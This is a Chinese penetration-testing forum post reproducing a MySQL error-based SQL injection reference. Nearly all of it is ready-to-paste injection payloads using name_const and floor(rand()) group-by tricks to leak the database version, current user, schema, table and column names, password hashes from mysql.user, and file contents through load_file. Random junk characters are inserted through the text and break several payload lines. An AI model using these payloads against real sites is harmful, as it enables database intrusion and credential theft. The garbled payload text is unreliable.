中国网络渗透测试联盟

标题: Mysql暴错注入参考（pdf） [打印本页]

---

作者: admin    时间: 2013-7-27 11:00
标题: Mysql暴错注入参考（pdf）
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
  T; Z0 X9 y; i5 q3 _6 T: V

Mysql暴错注入参考（pdf），每天一贴。。。

MySql Error Based Injection Reference
" I, L% {) k2 W$ H3 Z[Mysql暴错注入参考]
- [2 o& @6 p' y" O% C. F" LAuthornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
& ]& y7 l' ]3 W: E小部分版本使用name_const()时会报错.可以用给出的Method.2测试
2 [' z: E2 \) `5 M+ [6 p查询版本:
$ q0 @3 p  p4 x8 `3 gMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
2 {2 e% @: o# Q, Kjoin+(select+name_const(@@version,0))b)c)
4 D3 U( u! F$ l2 b! i; s- r6 _2 AMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
' _* m& y" M  @, Y6 F0 \' Vup by a)b)
查询当前用户:
5 s  y. R9 f/ ]3 A9 UMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
" V% B; G$ |8 j0 g) L7 D8 Q查询当前数据库:
( s8 i2 Z% @4 V& B  c% j: F) ZMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
! \( F* q9 E: |- g8 F3 A3 x& W. |( z顺序替换
! O9 D6 `! s1 X! G1 f( f( B* |' @) X爆指定库数目:
( D! W- Q2 E% Zand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
' Z; ?  N# K1 c/ Pable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
* P3 ~' z7 i) }, W3 C依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
- B: L6 @0 B- U! {( W; tbles+group+by+x)a)+and+1=1
7 w9 d. ]& M, ^- I$ A0x6D7973716C=Mysql 将n顺序替换
, M6 w# v" ?5 g! |  L" n爆表内字段数目:
+ Z# B* ^& `: b9 y& _" pand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
5 B1 V& n2 r" ]5 C! z1 |$ D+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
9 f' U- V5 f$ W. K2 j- F  U0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
4 j, A/ [5 |, N9 p8 B( t4 F: o+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
: h) v# A. _- d# m: ?( H, t" Q依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
7 \  W4 k+ F2 [# E, h5 N将n顺序替换
爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

6 a' f' o2 s% I不要下载也可以，
; k! L, b8 P1 w) Z  r. ?2 K

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2